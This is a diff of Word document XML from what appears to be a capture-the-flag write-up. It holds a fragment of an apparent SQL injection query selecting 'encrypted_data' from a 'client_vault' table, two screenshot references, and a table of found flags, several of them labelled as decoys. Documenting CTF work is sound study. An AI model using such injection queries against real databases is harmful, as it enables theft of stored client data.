+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>encrypted_data,'b','c</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">' FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>client_vault</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>—</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D9B42F6" wp14:editId="4DFB0F81">
+            <wp:extent cx="5498275" cy="3098066"/>
+            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
+            <wp:docPr id="1427756851" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1427756851" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5501085" cy="3099649"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:w="9354" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        </w:tblBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
+        <w:tblCellMar>
+          <w:top w:w="15" w:type="dxa"/>
+          <w:left w:w="15" w:type="dxa"/>
+          <w:bottom w:w="15" w:type="dxa"/>
+          <w:right w:w="15" w:type="dxa"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="5720"/>
+        <w:gridCol w:w="3634"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="416"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Flags Found</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> CORRECT?</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Keep_looking_elsewhere</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Not_the_real_flag_here</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:t>Nice_try_Kiddo_Now_try_next</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>YES</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{Trust_me_its_false_3}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5720" w:type="dxa"/>
+            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>FLAG{Trust_me_its_ture_3}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3634" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:t>NO</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDA5D8F" wp14:editId="7628CB69">
+            <wp:extent cx="5943600" cy="3341370"/>
+            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
+            <wp:docPr id="877861948" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="877861948" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3341370"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
                   </pic:spPr>
                 </pic:pic>
               </a:graphicData>

</xml_diff>